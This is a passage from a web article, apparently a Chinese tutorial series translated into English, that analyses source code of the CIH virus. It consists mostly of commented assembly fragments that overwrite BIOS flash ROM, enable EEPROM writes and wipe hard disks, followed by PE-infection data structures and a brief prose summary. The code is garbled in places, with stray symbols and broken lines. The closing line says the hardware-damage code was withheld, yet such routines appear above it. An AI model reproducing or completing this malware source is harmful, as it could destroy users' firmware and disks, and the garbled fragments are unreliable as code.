Analysis of virus program source code examples-CIH virus[5]
push ecx
loop $
;Destroy the additional 000E0000 - 000E007F segment ROM data in the BIOS, a total of 80h bytes
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $ # pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; Destroy the 000FE000 - 000FE07F segment data of the BIOS, 80h bytes in total
mov ah, 0e0h
mov [eax], al
[esi], 100ch
call esi
; Destroy all hard drives
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2CH
Push 0c0001000H
MOV BH, 08h
Push ebx
Push ECX
Push ECX ## Push Ecx ## Push 40000501h
Push Ecx
# push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
;Destroy the next area
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
Enable EEPROM to write information
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al , 44h
ret BCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath;The difference between the address of each Vxd call instruction
VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h;The call number of Vxd
VxdCallTableSize = ($-VxdCallIDTable)/04h; Program The number of calls using Vxd
;Definition of virus version and copyright information
VirusVersionCopyright db 'CIH v';Identification of CIH virus
db MajorVirusVersion+'0';Main version number
db '.'
db MinorVirusVersion+'0' ;Minor version number
db ' TATUNG' ;Author name
;Virus size
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)
; Dynamic data definition
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; Virus data starting address
OnBusy db 0; "Busy" flag
FileModificationTime dd ? File modification time
FileNameBufferSize dup(?) FileNameBufferSize dup(?) DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; Block number
TimeDateStamp dd ? ; File time
SymbolsPointer dd ?
NumberOfSymbols dd ? ; Number of symbols in the symbol table
SizeOfOptionalHeader dw ? ;The length of the optional header
_Characteristics dw ? ;Character set flag
Magic dw ? ;Flag word (always 010bh)
LinkerVersion dw ? ;Linker version number
SizeOfCode dd ? ; Code segment size
SizeOfInitializedData dd ? Initialized data block size
SizeOfUninitializedData dd ? Uninitialized data block size
AddressOfEntryPoint dd ? Program start RVA
BaseOfCode dd ? ; Code Section start RVA
BaseOfData dd ? ;Data section start RVA
ImageBase dd ? ;Load base address RVA
@9 = $
SectionAlignment dd ? ;Block alignment
FileAlignment dd ? ;File block alignment
OperatingSystemVersion dd ? ;Required operating system version number
ImageVersion dd ? ;User-defined version number
SubsystemVersion dd ? ;Required subsystem version number
Reserved dd ? ; Reserved
SizeOfImage dd ? ; Total length of each part of the file
SizeOfHeaders dd ? ; File header size
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ;Block name
VirtualSize = StartOfSectionTable+08h ;Section real length
VirtualAddress = StartOfSectionTable+0ch ;Block RVA
SizeOfRawData = StartOfSectionTable+10h ;Block physical length
PointerToRawData = StartOfSectionTable+14h ; Block physical offset
PointerToRelocations = StartOfSectionTable+18h ; Relocation offset
PointerToLineNumbers = StartOfSectionTable+1ch ; Line number table offset
NumberOfRelocations = StartOfSectionTable+20h ; Number of relocation items
NumberOfLinenNmbers = StartOfSectionTable+22h ; Number of line number tables
Characteristics = StartOfSectionTable+24h ; Block attributes
SizeOfScetionTable = Characteristics+04h-SectionName ; Length of each block table item
## ;Amount of memory required by the virus
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; ## From the above code analysis process, we can see that the CIH virus has a clear structure and distinct layers. The backbone structure of this virus program is very similar to that of the DOS virus, except that the details of the virus are processed according to the win95 method, and all system calls are made using Vxd. This makes the virus program more low-level, more efficient, and easier to program. Compared with using API functions under Windows, there is no need to consider the complex relocation process of the virus itself; compared with using interrupts, it can better prevent the tracking of the program. analyze.
The CIH virus has two innovations. First, when the virus infects, it searches for the blank areas between the blocks of the infected file, and writes the virus's own various data structures and codes into them (if the blank area is not enough, It is not contagious, which is one of the reasons why some files will not be infected); secondly, the virus can damage the computer hardware when it attacks, not only burning the Flash Memory, but also destroying the hard disk.
For security reasons, we have not given a detailed analysis of this part of the code that causes viruses to attack and damage hardware.
The above is the content of virus program source code example analysis-CIH virus [5]. For more related content, please pay attention to the PHP Chinese website (www.php.cn)!